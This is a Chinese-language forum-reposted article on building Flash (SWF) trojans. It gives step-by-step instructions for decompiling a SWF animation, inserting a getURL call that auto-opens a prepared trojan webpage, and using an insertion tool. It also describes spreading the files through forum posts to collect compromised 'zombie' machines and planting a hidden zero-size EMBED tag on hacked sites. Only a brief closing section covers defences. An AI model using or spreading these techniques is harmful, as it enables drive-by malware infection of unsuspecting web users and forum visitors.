黑客技术：Flash木马程序是怎样练成的

admin

　　在网站上观看Flash动画，接收到“好友”发来的一张Flash贺卡，甚至于一个QQ魔法表情，一不留神就中了一个木马!Flash动画木马可以说是无处不在，<a href="http://searchwhatis&#46;techtarget&#46;com&#46;cn/searchwhatis/308/3333808&#46;shtml" target="_blank">攻击</a>威力和覆盖面极其广。许多朋友一定想了解Flash木马的原理，想知道攻击者是如何在SWF中插入木马的呢?我们应该怎么样来防范Flash木马呢?<br />　　<b>更多黑客技术请看：</b><a href="http://soft&#46;yesky&#46;com/security/hkjc/" target="_blank"><b>天极黑客技术专区</b></a><br />　　<b>一、制作Flash动画木马的准备</b><br />　　Flash动画木马的原理，是在<a href="http://homepage&#46;yesky&#46;com/" target="_blank">网页</a>中显示或本地直接播放Flash动画木马时，让Flash自动打开一个网址，而该网址就是我们预先制作好的一个木马网页。也就是说，在制作网页木马前，我们首先需要制作好一个网页木马，并将它放置到某个网站上去。<br />　　另外，我们还需要准备一个比较吸引人的Flash动画文件“MM热舞&#46;swf”，以及Flash动画反编译工具“闪客精灵”，编辑工具Macromedia Flash MX。<br />　　<b>二、最原始的Flash木马</b><br />　　现在虽然有了许多各种各样的Flash动画木马制作工具，但是为了了解Flash动画木马的最基本原理，有必要从头开始用最原始的方法制作一个Flash木马。<br />　　步骤一：反编译SWF动画<br />　　首先我们需要将要插入网页木马的Flash动画文件“MM热舞&#46;swf”，反编译成可编辑的&#46;fla格式。运行“闪客精灵”，点击菜单“文件”→“快速打开”命令，指定“MM热舞&#46;swf”文件将其导入。然后点击工具栏上的“导出FLA”命令，将动画导出为“MM热舞&#46;fla”文件。<br />　　步骤二：插入网页木马代码<br />　　然后运行Flash动画编辑器Macromedia Flash MX，点击菜单“文件”→“打开”，调入刚才保存的fla文件。展开界面下方的“动作/帧”栏，再展开“动作”→“浏览器/网络”项，点击其中的“getURL”命令，在右边窗口中的“URL”里面输入我们的网页木马地址;窗口方式为“_blank”;“变量”设置为“使用GET方式发送”，在下方的代码窗口中将出现“getURL(&quot;http://网页木马地址&quot;, &quot;_blank&quot;, &quot;GET&quot;);”。<br />　　步骤三：生成Flash木马<br />　　设置完毕后保存文件，并点击菜单“文件”→“发布”命令，将动画重新导出为SWF格式。用IE浏览器打开刚才生成的Flash动画木马，可以看到随着Flash动画打开播放时，自动弹出一个浏览器窗口，里面将会显示我们的木马网页。c<br />　　<b>三、简简单单生成Flash木马</b> <br /><br />　　上面插入木马的过程比较麻烦，下面我们介绍一个简单的方法，也正是这些简单的工具使得Flash木马在网上随处可见。<br />　　运行SWF木马插入器，点击界面中的“选择”按钮，浏览指定要插入木马的SWF文件;在“插入代码”中输入木马网页的地址;切记不要勾选下面的“只解压”项。设置完毕后，点击“给我插”按钮，程序提示开始插入木马网页。显示成功信息后，关闭程序，用IE打开生成的动画，可以看到自动跳转到木马网页去了。<br />　　<b>四、Flash木马的利用</b><br />　　看到上面的步骤了吧，生成一个Flash动画木马是不是很简单?那么生成的Flash木马该如何应用呢?只要我们将Flash上传到某个网站中，就可以通过论坛或网站之类的直接利用了。<br />　　大部分的论坛中都可以发来Flash动画的帖子，利用论坛发帖，攻击者可以快速获得大量的肉鸡。以PHPWind v4&#46;3&#46;2 论坛为例，在发帖或回复时，点击编辑窗口上方的“插入Flash动画”按钮，设置Flash窗口大小，使用默认设置后，要求输入Flash的URL地址。确定后，可以看到编辑窗口中显示的代码为““(flash=400,300)hxxp://www&#46;flash**&#46;com&#46;cn/upfiles/20067**&#46;swf(/flash)””，这就是完整的Flash播放代码了，不同的论坛代码是不一样的。<br />　　应用二：网页嵌入Flash木马<br />　　攻击者入侵了某个大的网站之后，很可能在网站首页挂马，使用普通方式挂马会被管理员发觉，但是挂上Flash木马的话，是很难查杀的。攻击者可能在网页中插入如下代码：<br />　　“《EMBED src=http://网页木马地址/木马&#46;swf width=0 height=0 type=<a href="http://searchwhatis&#46;techtarget&#46;com&#46;cn/searchwhatis/315/2025315&#46;shtml" target="_blank">application</a>/x-shockwave-flash AUTOSTART=&quot;false&quot; ShowStatusBar=&quot;false&quot;》”，其中的《》改为&lt;&gt;。<br />　　这里的参数“width=0 height=0”表示，Flash播放窗口为零，也就是不显示Flash播放窗口。其它用户浏览网页时，就会莫名其妙的弹出一个木马网页窗口。<br />　　<b>五、关于Flash木马的防范</b><br />　　其实不管Flash木马有多么的巧妙，最终都是要跳转到木马网页去的，也就是说我们最终要防范的还是网页木马。了解了思路，对于Flash动画木马就简单了：<br />　　首先，要开启Windows XP SP2的窗口拦截窗口功能，或安装其它防弹出窗口的插件。如果那个漏网之鱼，莫名其妙弹出的网页窗口要及时的关闭。另外，一定要在上网浏览时开启杀毒软件的网页监控功能，只要网页木马在后台一下载到本地硬盘，就会被杀毒软件查杀，这样就万事无忧了!<br />　　PS:本文中对代码做了一些处理。<br /><br /><blockquote class="blockquote">From: http://www&#46;78st&#46;cn/bbs/read&#46;php?tid-8086&#46;html  Powered by PHPWind&#46;com</blockquote>